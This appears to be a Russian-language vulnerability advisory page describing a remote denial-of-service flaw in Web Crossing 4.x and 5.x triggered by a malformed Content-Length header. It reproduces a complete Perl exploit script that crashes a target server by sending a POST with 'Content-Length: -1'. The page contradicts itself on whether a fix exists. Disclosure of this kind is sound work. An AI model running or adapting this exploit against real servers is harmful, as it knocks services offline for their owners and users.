Отказ в облслуживании против Web Crossing

Дата публикации:
09.02.2004
Всего просмотров:
1049
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Отказ в обслуживании
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Web Crossing 4.x
Web Crossing 5.x
Уязвимые версии: Web Crossing 4.х, 5.х

Описание: Отказ в обслуживании обнаружен в Web Crossing. Удаленный пользователь может аварийно завершить работу сервера.

Удаленный пользователь может представить HTTP POST запрос с отрицательным или чрезмерно большим заголовком 'Content-Length', чтобы аварийно завершить работу сервера.

Пример/Эксплоит:

#!/usr/bin/perl -w
 
# Web Crossing 4.x\5.x Denial of Service Exploit
#  [ Bad 'Content-Length' Header Bug ]
 
#  - by Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[0]))
 
print "Usage: wxdos.pl <victim>\n";
exit;
 

print "Web Crossing 4.x\\5.x Denial of Service Exploit\n" .
      "\t[ Bad 'Content-Length' Header Bug ]\n" .
      "\t[peter4020\@hotmail.com]\n\n";

$victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0],
                             PeerPort=>"80")
                            or die "Unable to connect to $ARGV[0] on " .
                             "port 80";


$DoS    = "POST / HTTP/1.1\r\n" .
          "Content-Length: -1\r\n\r\n";

print $victim $DoS;

print "[+] Evil request made to target server ... Waiting...!\n";

sleep(4);

close($victim);

print "[+] Done!\n";
exit;

URL производителя:http://webcrossing.com/Home/products/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Web Crossing 4.x/5.x Denial of Service Vulnerability

или введите имя

CAPTCHA